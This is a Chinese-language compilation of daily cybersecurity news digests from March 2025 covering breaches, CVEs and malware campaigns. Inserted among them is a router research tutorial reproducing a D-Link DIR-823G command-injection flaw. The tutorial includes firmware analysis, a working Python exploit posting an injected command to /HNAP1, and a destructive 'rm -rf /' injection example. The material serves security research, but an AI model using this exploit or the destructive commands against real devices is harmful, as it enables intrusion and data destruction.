网络安全日报 2025年03月20日
1、研究人员在AMI MegaRAC中发现安全漏洞
https://www.bleepingcomputer.com/news/security/critical-ami-megarac-bug-can-let-attackers-hijack-brick-servers/ 研究人员在MegaRAC基板管理控制器(BMC)软件中发现一个新的安全漏洞,可能允许攻击者劫持并可能使易受攻击的服务器瘫痪。该漏洞被标识为CVE-2024-54085,攻击者能够利用此漏洞远程控制被入侵的服务器,远程部署恶意软件、勒索软件,进行固件篡改,使主板组件瘫痪、服务器遭受物理损坏(过电压/瘫痪),以及无限重启循环。研究人员表示CVE-2024-54085身份验证绕
2、研究人员在Adobe Acrobat Reader中发现三个安全漏洞
https://cybersecuritynews.com/adobe-acrobat-reader-vulnerabilities/ 研究人员在Adobe Acrobat Reader中发现了三个安全漏洞,这些漏洞可能允许攻击者执行任意代码或泄露敏感信息。这三个漏洞分别是CVE-2025-27158(CVSS评分8.8)、CVE-2025-27163(CVSS评分6.5)、CVE-2025-27164(CVSS评分6.5)。CVE-2025-27158是一个高危内存损坏漏洞,可能允许攻击者在受害者的系统上执行任意代码。CVE-2025-27163和CVE-2025-27164是Adobe
3、区块链游戏平台WEMIX证实遭受网络攻击
https://www.bleepingcomputer.com/news/security/blockchain-gaming-platform-wemix-hacked-to-steal-61-million/ 区块链游戏平台WEMIX上个月遭受网络攻击,攻击者窃取了865.486万个WEMIX币,当时价值约为610万美元。WEMIX首席执行官证实该事件发生于2025年2月28日,攻击者在窃取了用于监控NFT平台“NILE”服务的身份验证密钥后,渗透了WEMIX。攻击者花了两个月的时间策划他们的攻击,最终尝试执行15次提款,并成功13次。攻击者很快将窃取的WEMIX币通过加密货币交易所进
4、西班牙皇家学院证实遭受勒索软件攻击
https://www.escudodigital.com/ciberseguridad/rae-confirma-haber-sufrido-ataque-ransomware_62705_102.html 西班牙皇家学院(RAE)证实遭受勒索软件攻击,其信息技术基础设施于2月1日晚间遭受了网络攻击。 Fog勒索组织于3月17日通过其网站称其入侵了RAE,但没有具体说明是如何进行攻击的。该勒索组织声称从该学院窃取1GB的数据,其中包括员工和客户的联系方式、内部公司财务文件以及人力资源文件。
5、mySCADA漏洞或被攻击者掌控工业控制系统
https://thehackernews.com/2025/03/critical-myscada-mypro-flaws-could-let.html 网络安全研究人员披露了影响mySCADA myPRO系统的两个重大漏洞的细节。myPRO是一种广泛应用于工业技术(OT)环境中的监控与数据采集(SCADA)系统,这些漏洞可能使恶意攻击者控制易受攻击的设施。
6、微软将于2025年10月终止对Windows 10的支持,不再提供安全更新
https://cybersecuritynews.com/microsoft-to-end-support-for-windows-10/ 微软将于2025年10月14日终止对Windows 10的支持,不再提供安全更新,数百万用户将面临严重的安全威胁,企业需紧急规划迁移策略。
7、Windows文件管理器漏洞可导致网络欺骗攻击,PoC已发布
https://cybersecuritynews.com/microsoft-windows-file-explorer-vulnerability-let-attackers/ Windows文件管理器漏洞CVE-2025-24071可导致攻击者通过解压文件窃取NTLM哈希,无需用户交互,PoC已发布。
8、GitHub Action 漏洞引发连锁供应链攻击
https://www.bleepingcomputer.com/news/security/github-action-hack-likely-led-to-another-in-cascading-supply-chain-attack/ GitHub Action 漏洞引发连锁供应链攻击,reviewdog/action-setup@v1 被攻破,导致 tj-actions/changed-files 泄露数千个存储库的 CI/CD 机密信息,威胁极大。
9、AI代码编辑器被利用进行隐蔽的供应链攻击
https://securityaffairs.com/175593/hacking/rules-file-backdoor-ai-code-editors-silent-supply-chain-attacks.html 新型“规则文件后门”攻击利用AI代码编辑器注入恶意代码,通过隐藏的Unicode字符绕过审查,操纵AI生成有害代码,构成供应链风险,影响数百万用户。
10、Bybit遭黑:高度复杂的多阶段攻击细节曝光
https://cybersecuritynews.com/bybit-hack-sophisticated-multi-stage-attack/ 加密货币交易所Bybit近期发现其以太坊冷钱包遭到未经授权的活动,导致了一次重大安全漏洞。事件发生在通过Safe{Wallet}进行的ETH多签交易过程中,攻击者介入并篡改了交易,最终从交易所的冷钱包中转走了超过40万枚ETH。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年03月19日
1、研究人员发现一种名为StilachiRAT的新型远控木马
https://www.microsoft.com/en-us/security/blog/2025/03/17/stilachirat-analysis-from-system-reconnaissance-to-cryptocurrency-theft/ 研究人员发现了一种名为StilachiRAT的新型远控木马,它具有规避检测、保持持久性以及窃取敏感数据等恶意功能。研究人员对具有远控功能的WWStartupCtrl64.dll模块分析后发现,它会从目标系统中窃取多种信息,包括存储在浏览器中的凭据、数字钱包信息、存储在剪贴板中的数据以及系统信息。研究人员尚未将StilachiRAT归因于
2、Babuk勒索组织声称攻击法国电信运营商Orange
https://cybernews.com/security/hackers-threaten-release-of-orange-clients-data/ Babuk勒索组织声称对法国电信运营商Orange进行攻击。该组织表示,他们于3月16日入侵了Orange,声称窃取了4.5TB的详细信息,并列出窃取的数据包括电子邮件地址、客户记录、源代码、内部文档、发票、合同、项目、工单、用户数据、员工数据、消息、信用卡、通话记录以及其他个人身份信息(PII)。
3、医疗保健供应商Ascom遭受网络攻击
https://www.marketwatch.com/story/ascom-ticketing-system-hit-by-cyber-attack-9a9cab1a 医疗保健供应商Ascom遭受网络攻击,其技术票务系统受到此次网络攻击的破坏。Ascom在发现攻击后,立即关闭了其票务系统。Ascom表示其他信息技术系统和客户系统未受影响。Hellcat勒索组织声称入侵了Ascom的IT基础设施。Ascom的IT网络安全团队正在对此事件进行调查。
4、Cloudflare推出后量子加密技术,抵御量子计算机攻击
https://www.freebuf.com/articles/es/424967.html Cloudflare宣布为其Zero Trust平台推出首个端到端量子安全准备阶段,使企业能够保护其公司网络流量,抵御未来的量子计算机威胁。这一举措基于自2017年以来Cloudflare对后量子密码学的研究,旨在应对人们对传统加密方法在量子计算攻击下脆弱性的日益担忧。
5、谷歌以320亿美元收购Wiz,加速AI时代云安全与多云战略
https://www.freebuf.com/articles/network/424966.html 近日,谷歌宣布已签署最终协议,将以320亿美元全现金交易收购网络安全公司Wiz,这项交易需通过相关调整后最终完成。交易完成后,Wiz将并入谷歌云(Google Cloud)。
6、谷歌发布开源版OSV扫描工具,助力漏洞检测
https://www.freebuf.com/vuls/424937.html 谷歌近日正式发布了OSV-Scanner V2.0.0版本,这是其开源漏洞扫描工具的重大升级。该版本于2025年3月17日发布,标志着它在帮助开发者识别和修复软件依赖项中安全漏洞的能力取得了显著进展。V2版本在OSV-SCALIBR的基础上进行了升级,引入了大量新功能,使OSV-Scanner转型为一个全面的漏洞检测和修复平台。自2022年12月首次发布以来,OSV-Scanner已经成为开源安全领域的重要工具,帮助开发者轻松获取与其项目相关的漏洞信息。
7、Linux 内核高危漏洞CVE-2024-36904已公开利用
https://www.freebuf.com/vuls/424945.html 安全研究人员近日公开了一个针对CVE-2024-36904的概念验证(PoC)利用程序。这个高危的“释放后使用”(use-after-free)漏洞存在于Linux内核中,且已潜伏七年之久。该漏洞影响了TCP子系统,攻击者可能利用它以内核权限执行远程代码。
8、GitHub遭大规模钓鱼攻击:虚假“安全警报”利用OAuth应用劫持账户
https://www.bleepingcomputer.com/news/security/fake-security-alert-issues-on-github-use-oauth-app-to-hijack-accounts/ 近日,一场大规模的钓鱼攻击席卷了GitHub平台上近12,000个代码仓库,攻击者通过发布虚假的“安全警报”问题,诱骗开发者授权一个恶意OAuth应用,从而获取对他们账户和代码的完全控制权。
9、GSMA 确认RCS端到端加密,实现跨平台安全消息传递
https://thehackernews.com/2025/03/gsma-confirms-end-to-end-encryption-for.html 全球移动通信系统协会 (GSMA) 正式宣布支持通过富通信服务 (RCS) 协议发送的消息的端到端加密 (E2EE),为Android和iOS平台之间共享的跨平台消息提供急需的安全保护。
10、上下文合规攻击成功突破多数主流AI模型
https://cybersecuritynews.com/new-context-compliance-attack-jailbreaks-ai-models/ 一种名为上下文合规攻击(Context Compliance Attack,CCA)的新方法,出乎意料地简单,却能够绕过大多数主流AI系统的安全防护。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年03月18日
1、研究人员发布用于解密Linux版Akira勒索软件的解密器
https://www.bleepingcomputer.com/news/security/gpu-powered-akira-ransomware-decryptor-released-on-github/ 研究人员发布了一个用于解密Linux版Akira勒索软件的解密器,该解密器利用GPU来检索解密密钥并解密文件。该解密器通过利用Akira勒索软件基于当前时间(以纳秒为单位)作为种子生成加密密钥这一特点,来暴力破解加密密钥。研究人员使用了16个RTX 4090 GPU在大约10小时内暴力破解解密密钥,但是根据需要恢复的加密文件数量,整个过程可能需要几天时间。研究人员在报告中指出,代码还
2、研究人员发现Delphi语言中存在内存损坏漏洞
https://cybersecuritynews.com/critical-vulnerabilities-in-delphi-code/ 研究人员发现Delphi编程语言中存在严重的内存损坏漏洞,这些风险可能导致受影响的软件程序崩溃、数据泄露、甚至远程代码执行。这些漏洞与Delphi处理内存管理有关,尤其是在数组、字符串和对象分配等方面。研究人员的研究表明,即使启用了一些安全机制,Delphi中的编程错误也可能导致可利用的安全漏洞。研究团队构建了多个概念验证示例来演示这些漏洞,重点关注基于堆栈和堆的损坏场景。他们的研究结果表明,虽然调试版本可以通过范围检查捕获一些问题,但使用默认编译器设
3、美国西部联盟银行披露一起数据泄露事件
https://www.claimdepot.com/data-breach/western-alliance-bank 美国西部联盟银行(WAB)披露了一起影响其客户个人信息的数据泄露事件,该事件发生于2024年10月12日至2024年10月24日之间。调查显示,此次泄露源于第三方供应商安全文件传输软件中的一个漏洞。西部联盟银行和许多其他组织都使用了该软件。未经授权的攻击者利用了这个以前未知的漏洞,获得了对西部联盟银行部分系统的访问权限,并获取了存储在这些系统中的文件副本。西部联盟银行于2025年1月27日发现了未经授权的访问。经过广泛审查,该银行于2025年2月21日确定,泄露的文件中包
4、攻击者声称出售1200万法国人的数据信息
https://www.presse-citron.net/alerte-generale-les-donnees-de-12-millions-de-francais-fuitent-en-ligne/ 一个昵称为“Angel_Batista”的网络犯罪分子在黑客论坛上声称出售1200万法国人的个人信息,涉及姓名、家庭住址、联系方式等各类详细信息。攻击者称这些数据是在上个月窃取的,但他没有说明具体的窃取途径,并且该攻击者发布了一份10万人的数据样本,以证明其真实性。攻击者以一万美元的价格出售这些数据,并且只接受买家通过XMR加密货币进行付款。目前这些数据的真实性及有效性尚未经过验证。
5、思科IOS XR漏洞导致路由器BGP进程崩溃
https://www.freebuf.com/vuls/424708.html 思科近日修复了一个拒绝服务(DoS)漏洞,该漏洞编号为CVE-2025-20115,可能导致未经身份验证的远程攻击者通过发送单一BGP更新消息,使IOS XR路由器中的边界网关协议(BGP)进程崩溃。
6、勒索软件攻击创历史新高:2025年2月攻击量激增126%
https://hackread.com/ransomware-attacks-hit-record-high-in-february-2025/ Bitdefender的报告显示,2025年2月是勒索软件攻击历史上最严重的一个月,宣称的受害者数量较去年同期激增126%。
7、近百万台企业和个人电脑遭恶意软件入侵
https://www.csoonline.com/article/3845100/fast-1-million-geschafts-und-privat-pcs-kompromittiert.html 微软在最近的一份报告中得出了这些结论。2024年12月初发现的大规模数据窃取活动展示了此类感染的广泛程度及其潜在后果。犯罪分子利用GitHub、Discord和Dropbox将恶意软件传播到近百万台设备上。
8、恶意PyPI包窃取云令牌,移除前下载量超1.4万次
https://www.freebuf.com/articles/database/424701.html 网络安全研究人员近日警告,Python包索引(PyPI)仓库用户正成为恶意攻击的目标。攻击者通过伪装成与“时间”相关的工具包,实则隐藏了窃取敏感数据(如云访问令牌)的功能。软件供应链安全公司ReversingLabs表示,他们发现了两组共计20个恶意包,累计下载量超过1.41万次。
9、腾达 AC7 路由器漏洞:攻击者可获取 Root Shell 权限
https://www.anquanke.com/post/id/305052 运行固件版本 V15.03.06.44 的腾达 AC7 路由器存在一个严重漏洞,恶意行为者可利用该漏洞执行任意代码并获取根 shell 访问权限。该漏洞源于路由器 formSetFirewallCfg 函数中的栈溢出漏洞。攻击者可通过精心构造的 HTTP 请求完全攻陷受影响的设备。
10、AI 成为网络犯罪分子高速执行攻击的强大工具
https://www.anquanke.com/post/id/305071 人工智能已成为网络犯罪分子武器库中一种强大的武器,使他们能够以前所未有的精准度、速度和规模发动攻击。安全专家警告称,网络犯罪分子越来越多地利用自动化人工智能系统渗透网络、窃取数据,并以人工操作无法企及的速度部署智能病毒。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
路由器安全研究:D-Link DIR-823G v1.02 B05 复现与利用思路
前言
D-Link DIR-823G v1.02 B05存在命令注入漏洞,攻击者可以通过POST的方式往 /HNAP1发送精心构造的请求,执行任意的操作系统命令。
漏洞分析
binwalk提取固件,成功获取到固件。
现在我们已经进入到应用里了,那么我们在进行分析固件的时候,应该怎么去分析这个情况?首先,我们去分析别人的漏洞,别人是会告诉哪里会出现问题。但是我们现在假设我们是分析一个未知固件,我们就得先知道这个固件有哪些应用,启动了哪些服务,最清晰和简便的方式就是去看我们etc文件下面,里面有个叫init.d的目录,里面是关于启动项的内容。
我们首先来看rcS下面的内容 vim rcS
首先是设置ip,然后挂载了两个文件系统分别是proc,这是与进程相关的文件系统,包括当前进程启动存放在哪个地址。
还有ramfs文件系统,根据以前的笔记,可知ramfs文件系统跟RAM相关。
然后下面就是判断是否还有挂载别的文件系统。
然后mkdir就是创建各种各样的文件夹,都有对应的功能,比如说创建了pptp文件夹,针对拨号上网的功能,然后还有smbd服务,可以看到创建了一个usb的文件夹,说明该固件有可以跟usb也就是U盘相关的操作,接下来都是一些配置信息。
继续往下翻
可以看到该固件启动了web server的web服务,也就是httpd的内容,这里启动的是goahead,通过这个名字,我们可以确定web服务就是goahead,如果想要分析web服务的话,就直接分析goahead就可以。
我们回到squashfs-root目录下,搜索goahead的一些简单情况
grep -ir "goahead" .
最下面是两个启动项的内容,可以忽略,然后第一行是bin的可执行应用,这个其实就是我们最后分析的内容。
那如何分析呢?它是一个HNAP1请求,那就可以去检索我们的HANP1请求
grep -ir "HNAP1" .
可以看到它检索到一些js代码,js代码对我们来说一般,(比较我们是找二进制相关的漏洞)
但是,我们可以发现它匹配了一个二进制程序,也就是goahead。
这里我们先科普一下goahead的一些情况:
GoAhead ,它是一个源码,免费、功能强大、可以在多个平台运行的嵌入式WebServer。
goahead的websUrlHandlerDefine函数允许用户自定义不同url的处理函数。
它在进行编写与它相关的请求,是通过websUrlHandlerDefine来确定的。
websUrlHandlerDefine(T("/HNAP1"),NULL,0, websHNAPHandler,0);
websUrlHandlerDefine(T("/goform"),NULL,0, websFormHandler,0);
websUrlHandlerDefine(T("/cgi.bin"),NULL,0, websCgiHandler,0);
使用ghidra进行逆向分析,goahead二进制文件在squashfs-root目录下的bin目录下
那进入到goahead反编译界面该如何分析呢?一种是找到main函数去进行分析,比较耗时
一种是通过关键字来搜索,反推调用情况,来推测每个功能的解析情况 ctrl+shift+E
匹配成功,停在指定区域
但是它所对应的反编译代码还是很多的,所以我们可以通过反编译出来的函数名,进行查看它的调用关系。
一路往下翻,终于找到我们所要的东西
而且我们看到,这个函数继续往上调的话就是main函数了,所以其实一开始也是可以从main函数来分析的(0.0)
所以现在我们可以重点来分析这个函数
前面还是做一些判断,然后请求还有不止HNAP1,对应的都是一个函数。
同一个函数做的事情,类似于websUrlHandlerDefine这个函数,那HANP1对应的函数是
FUN_0042383c,那就双击进去看看
这里就是漏洞点,这里执行了memset和snprintf,一般来说这里应该是不存在漏洞点,但是下面一条语句是system,也就是把格式化化的字符串直接就拿到了system函数作为参数传递进去,而snprintf这里的参数有个echo,有个单引号问题。
比如说正常代码
#!/bin/bash
read -p "Enter your name: " name
echo 'Hello, '$name'!'
攻击步骤:
正常输入:用户输入 Alice,输出:
Hello, Alice!
恶意输入:用户输入 '$(id)',此时脚本实际执行的命令变为:
echo 'Hello, ''$(id)'!'
输出:
Hello, $(id)!
单引号内的 $(id) 不会被执行,暂时安全。
更危险的输入:用户输入 ' && rm -rf / #,命令变为:
echo 'Hello, '' && rm -rf / #'!
此时,第一个单引号被用户输入的 ' 闭合。&& rm -rf / 成为独立命令,在 echo 之后执行。# 注释掉后续的 '!,避免语法错误。
那么会导致rm -rf / 会被执行,删除系统文件!
所以,如果我们构造一些恶意的代码写入到snprintf中,再传递到system函数,就会造成命令注入漏洞。
但是我们要进到漏洞点的话,还需要满足函数上面的一些要求。
所以我们得符合上面函数的一些限制才能进入到漏洞点来,这里先取了PTR_s_SetMultipleActions_00588d80的首地址,赋值给DAT_0058a6c4,然后DAT_0058a6c4自身判断和自加2来进行循环判断,用strstr函数查找DAT_0058a6c4在param_+0x524中出现的位置,并赋值给pcVar1,如果pcVar1的值不为0的话,就会进入到我们的漏洞点来。
DAT_0058a6c4与PTR_s_SetMultipleActions_00588d80相关,双击进去看看
可以看到里面都是它对应的一些方法,比如说SetMultipleActions之类的。
固件模拟
分析到这里,基本上是明朗了,接下来就要进行固件模拟操作,使用firmadyne模拟固件启动。
sudo ./DIR823G_V1.0.2B05_20181207.sh
然后firmadyne默认的密码就是firmadyne
得等一段时间,然后192.168.0.1
但是这个一直搞不定,模拟不起来,也不知道是什么原因,排查不出。
然后换成了firmware analysis plus (fap)这个框架,就模拟起来了
等一段时间后,回车,就可以模拟起来了,输入192.168.0.1
进入向导,随便输入点东西
密码8位,输入12345678
然后就开始配置一些内容,同时可以注意到左侧已经把一些数据写入到关键的文件夹中
配置完毕,登录,成功进入路由器
exp编写
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import requests
ip='192.168.0.1'
command="'`echo aaaaaaaaa > /web_mtn/test.txt`'"
length=len(command)
headers=requests.utils.default_headers()
headers["Content-Length"]=str(length)
headers["User-Agent"]="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36"
headers["SOAPAction"]='"http://purenetworks.com/HNAP1/GetClientInfo"'
headers["Content-Type"]="text/xml; charset=UTF-8"
headers["Accept"]="*/*"
headers["Accept-Encoding"]="gzip, deflate"
headers["Accept-Language"]="zh-CN,zh;q=0.9,en;q=0.8"
payload=command
r=requests.post('http://'+ip+'/HNAP1/', headers=headers, data=payload)
因为是http请求,所以我们使用requests,然后设置ip,设置命令,构造报头,最后post请求将HNAP1,headers和payload都传过去。
复现完毕,ctrl+a 然后x结束固件模拟。
网络安全日报 2025年03月17日
1、研究人员发现新型勒索软件SuperBlack
https://www.forescout.com/blog/new-ransomware-operator-exploits-fortinet-vulnerability-duo/ 研究人员在一月底至三月初之间发现了一系列基于两个Fortinet漏洞的入侵事件。这些事件始于对Fortigate防火墙设备的恶意利用,这两个漏洞均为身份验证绕过漏洞,分别是CVE-2024-55591和CVE-2025-24472,并最终部署了一种被命名为“SuperBlack”的新型勒索软件。研究人员将这些入侵事件归因于其命名为“Mora_001”的攻击组织,该组织使用高度结构化的攻击链,并且在不同受害者之间
2、ESHYFT健康科技公司因配置错误暴露医护人员信息
https://cybersecuritynews.com/86000-healthcare-staff-records-exposed/ 研究人员发现一起涉及医护人员信息的数据泄露事件,该事件暴露了ESHYFT健康科技公司的86000多条记录。研究人员发现了一个不受保护的AWS S3存储桶,其中包含约108.8GB数据,这些数据缺乏密码保护或加密,导致私人医护人员信息可以被公开访问。这个配置错误的云存储中包含高度敏感的个人身份信息(PII),包括个人资料图片、工作日程、专业证书和可能受HIPAA法规保护的医疗文件。该公司发布了一份简短声明,确认收到了通知并表示正在调查此次事件。
3、研究人员披露名为OBSCURE#BAT的攻击活动
https://www.securonix.com/blog/analyzing-obscurebat-threat-actors-lure-victims-into-executing-malicious-batch-scripts-to-deploy-stealthy-rootkits/ 研究人员发现一个名为“OBSCURE#BAT”的隐秘的恶意软件攻击活动,该活动利用社会工程学和具有欺骗性的文件诱骗用户执行高度混淆的批处理脚本,最终会植入一个用户模式的rootkit,该rootkit会操纵系统进程和注册表项,能够隐藏或屏蔽任何以特定前缀开头的文件、注册表项或任务,以规避检测并保持持久性
4、攻击者通过YouTube平台传播DCRat恶意软件
https://securelist.com/new-wave-of-attacks-with-dcrat-backdoor-distributed-by-maas/115850/ 自今年年初以来,研究人员追踪到新一轮的DCRat传播活动。攻击者通过YouTube平台传播DCRat恶意软件,攻击者创建虚假账号或使用窃取的账号,上传宣传作弊器、破解软件、游戏机器人或其他类似软件的视频。在视频描述中含有下载链接,该链接指向一个合法的共享文件服务,其中包含一个受密码保护的压缩包文件,解压密码存在于视频描述中,而压缩包文件中的程序将会在受害者电脑中植入DCRat恶意软件。
5、思科修复IOS XR中的一个拒绝服务漏洞
https://www.bleepingcomputer.com/news/security/cisco-vulnerability-lets-attackers-crash-bgp-on-ios-xr-routers/ 思科修复了一个拒绝服务(DoS)漏洞,该漏洞允许攻击者通过一条BGP更新消息使IOS XR路由器上的边界网关协议(BGP)进程崩溃。该漏洞被标识为CVE-2025-20115,成功利用该漏洞允许未经身份验证的攻击者通过缓冲区溢出导致内存损坏,从而导致BGP进程重启,在低复杂度的攻击中远程关闭易受攻击的设备。
6、攻击者针对Jupyter Notebooks环境进行攻击
https://www.aquasec.com/blog/stopping-sobolan-with-aqua-runtime-protection/ 研究人员发现了一个新的恶意软件活动,该活动专门针对Jupyter Notebooks等交互式计算环境,对云原生基础设施构成了重大威胁。攻击者通过未经身份验证的JupyterLab实例获得初始访问权限,然后下载包含恶意二进制文件和shell脚本的压缩包文件。一旦执行,这些脚本就会启动一系列用于劫持系统资源进行加密货币挖矿、建立持久性并规避检测的进程。
7、多个僵尸网络利用Edimax物联网设备漏洞进行攻击活动
https://www.akamai.com/blog/security-research/march-edimax-cameras-command-injection-mirai 研究人员在蜜罐网络中发现了针对URI /camera-cgi/admin/param.cgi的攻击活动。经过进一步调查,研究人员将此活动归因于针对Edimax IoT设备的漏洞利用尝试。在分析固件后,研究人员确定这些漏洞是影响Edimax IoT设备的命令注入漏洞,该漏洞被标识为CVE-2025-1316。研究人员于2024年10月首次在蜜罐中发现攻击活动,并已发现多个僵尸网络利用此漏洞,包括Mirai变种。
8、研究人员披露一起针对PyPI存储库的攻击活动
https://thehackernews.com/2025/03/malicious-pypi-packages-stole-cloud.html 研究人员披露一起针对Python包索引(PyPI)存储库的攻击活动,攻击者使用伪装的虚假库,最终窃取云访问令牌等敏感数据。研究人员发现了两组总计20个恶意软件包,这些软件包累计下载量超过14100次。目前这些所有已识别的恶意软件包均已从PyPI中删除。
9、ruby-saml库中存在两个身份验证绕过漏洞
https://cybersecuritynews.com/ruby-saml-vulnerabilities-bypass-authentication/ 研究人员在ruby-saml库中发现了两个严重的身份验证绕过漏洞,可能使大量Web应用程序遭受帐户接管攻击。这两个漏洞是CVE-2025-25291和CVE-2025-25292,这些漏洞源于ruby-saml在SAML响应签名验证过程中使用了两个不同的XML解析器,这种双解析器方法具有安全缺陷,允许攻击者操纵验证检查。使用ruby-saml库的组织应立即更新到1.18.0版本,以修复漏洞。
10、攻击者声称窃取本田汽车印度客户的数据信息
https://cybersecuritynews.com/hackers-allegedly-selling-honda-cars-data/ 一个昵称为“Empire”的攻击者在网络犯罪论坛上声称出售包含本田汽车印度有限公司3176958条记录的数据库。据称,泄露的数据包括敏感的客户信息,例如姓名、别名、地址、客户ID以及移动电话号码和电子邮件地址等联系方式。本田汽车印度公司尚未就此次事件发表官方声明。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年03月14日
1、研究人员披露新型恶意软件AnubisBackdoor
https://cybersecuritynews.com/new-fully-undetected-anubis-malware/ 研究人员发现一种名为AnubisBackdoor的基于Python编写的新型后门程序,该恶意软件由Savage Ladybug攻击组织(也称为FIN7)开发,攻击者能够利用该恶意软件执行远程命令、窃取敏感数据,并进一步攻击目标组织网络基础设施中的系统。研究人员称攻击者似乎主要通过钓鱼邮件传播AnubisBackdoor,用户会收到看似合法的电子邮件,其中包含恶意附件或链接。
2、FreeType中存在安全漏洞并已被恶意利用
https://www.bleepingcomputer.com/news/security/facebook-discloses-freetype-2-flaw-exploited-in-attacks/ 研究人员称,FreeType 2.13之前的所有版本中存在一个安全漏洞,可能导致任意代码执行,并且有报告称该漏洞已在攻击中被恶意利用。FreeType是一个流行的开源字体渲染库,用于显示文本和以编程方式向图像添加文本。该库被安装在数百万个系统和服务中,包括Linux、安卓、游戏引擎、GUI框架和在线平台。该漏洞被标识为CVE-2025-27363(CVSS评分为8.1),已在FreeTy
3、微软推出安全更新修复57个安全漏洞
https://www.bleepingcomputer.com/news/microsoft/microsoft-march-2025-patch-tuesday-fixes-7-zero-days-57-flaws 微软于2025年3月的“周二补丁日”推出安全更新,总共修复57个安全漏洞,其中包括6个正在被利用的零日漏洞。按照漏洞类别进行分类后,每个漏洞类别中的数量为:23个权限提升漏洞、3个安全功能绕过漏洞、23个远程代码执行漏洞、4个信息泄露漏洞、1个拒绝服务漏洞、3个欺骗漏洞。
4、攻击者声称泄露捷豹路虎的数据信息
https://cybersecuritynews.com/threat-actor-allegedly-claiming-breach/ 一个昵称为“Rey”的攻击者声称入侵了捷豹路虎(JLR)的内部系统,并泄露了约700份包含敏感技术和运营数据的内部文件。研究人员称,泄露的数据包括专有源代码、车辆开发日志、跟踪数据集以及包含用户名、电子邮件地址、显示名称和时区的员工数据库。泄露的数据涵盖了捷豹路虎内部运营的多个类别。开发日志通常用于跟踪软件迭代和硬件集成过程,可能会暴露捷豹路虎车辆固件或车载系统中的漏洞。源代码是汽车公司的关键资产,此次泄露包含源代码,表明驾驶辅助系统、信息娱乐平台或电动
5、黑客滥用微软Copilot发动高仿钓鱼攻击
https://www.freebuf.com/news/424552.html 随着越来越多企业将微软Copilot集成到其日常工作中,网络犯罪分子瞄准了这一AI助手的用户,发起了高度复杂的钓鱼攻击。微软Copilot自2023年推出以来,因其与Microsoft 365应用的深度集成和AI驱动的功能,迅速成为许多企业的重要生产力工具。然而,这种广泛的应用也为网络犯罪分子提供了新的攻击渠道。
6、CISA警告:苹果WebKit越界写入漏洞已被野外利用
https://www.freebuf.com/vuls/424562.html 美国网络安全和基础设施安全局(CISA)近日警告称,苹果WebKit浏览器引擎中存在一个被野外利用的零日漏洞,编号为CVE-2025-24201。该漏洞属于越界写入问题,攻击者可能利用它在受影响的设备上执行未经授权的代码。WebKit是Safari及其他跨平台应用的核心浏览器引擎,广泛用于macOS、iOS、Linux和Windows系统。
7、新型XCSSET恶意软件利用增强混淆技术攻击macOS用户
https://www.freebuf.com/articles/web/424375.html 微软威胁情报团队发现了一种新型的XCSSET变种,这是一种复杂的模块化macOS恶意软件,能够感染Xcode项目,并在开发者构建这些项目时执行。这是自2022年以来的首个已知XCSSET变种,采用了增强的混淆方法、更新的持久化机制以及新的感染策略,旨在窃取macOS用户的敏感信息。
8、AI 辅助的虚假 GitHub 仓库窃取敏感数据,包括登录凭证
https://www.freebuf.com/articles/database/424374.html 近期发现了一种复杂的恶意软件活动,该活动利用人工智能创建具有欺骗性的 GitHub 仓库,并分发 SmartLoader 负载,最终部署名为 Lumma Stealer 的危险信息窃取恶意软件。该操作利用 GitHub 的信任声誉绕过安全防御,通过 AI 生成的文档和精心混淆的脚本,针对寻求游戏模组、破解软件和加密货币工具的用户。
9、Picklescan漏洞或让黑客绕过AI安全检测
https://hackread.com/picklescan-vulnerabilities-bypass-ai-security-checks/ Sonatype研究人员揭示了picklescan中的关键漏洞,这些漏洞对AI模型安全、Hugging Face平台以及开发者的最佳实践产生了重大影响。
10、CISA警示:Medusa勒索病毒已影响美国超300家关键基础设施机构
https://www.bleepingcomputer.com/news/security/cisa-medusa-ransomware-hit-over-300-critical-infrastructure-orgs/ 美国网络安全和基础设施安全局(CISA)近日透露,截至上个月,Medusa勒索病毒已经对美国关键基础设施领域的300多家机构造成了影响。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年03月13日
1、攻击者利用PHP严重漏洞进行攻击活动
https://www.securityweek.com/mass-exploitation-of-critical-php-vulnerability-begins/ 研究人员称,攻击者已开始大规模恶意利用PHP中的一个严重的安全漏洞,该漏洞可能允许攻击者在易受攻击的服务器上执行远程代码。该漏洞被标识为CVE-2024-4577(CVSS评分9.8),如果设置为使用某些代码页,则该漏洞可以在使用Apache和PHP-CGI的Windows服务器上被利用,以远程注入参数并执行任意代码。CVE-2024-4577漏洞在PHP版本8.1.29、8.2.20和8.3.8中得到修复,建议用户尽快进行
2、Sunflower医疗集团披露一起数据泄露事件
https://therecord.media/kansas-healthcare-provider-data-breach Sunflower医疗集团表示,攻击者于12月15日入侵了他们的系统,其近22.1万名患者的信息被攻击者访问。受影响的人员的姓名、地址、出生日期、社会安全号码、驾照号码、医疗信息和健康保险信息可能已泄露。该公司表示,他们最初于1月7日发现了此次事件,并聘请了一家网络安全公司进行调查,之后发现攻击者自12月中旬以来就已入侵其系统,并复制了Sunflower的文件。Rhysida勒索组织于1月份声称对此次攻击事件负责,并威胁称如果未支付约80万美元的赎金,将泄露其窃取的数
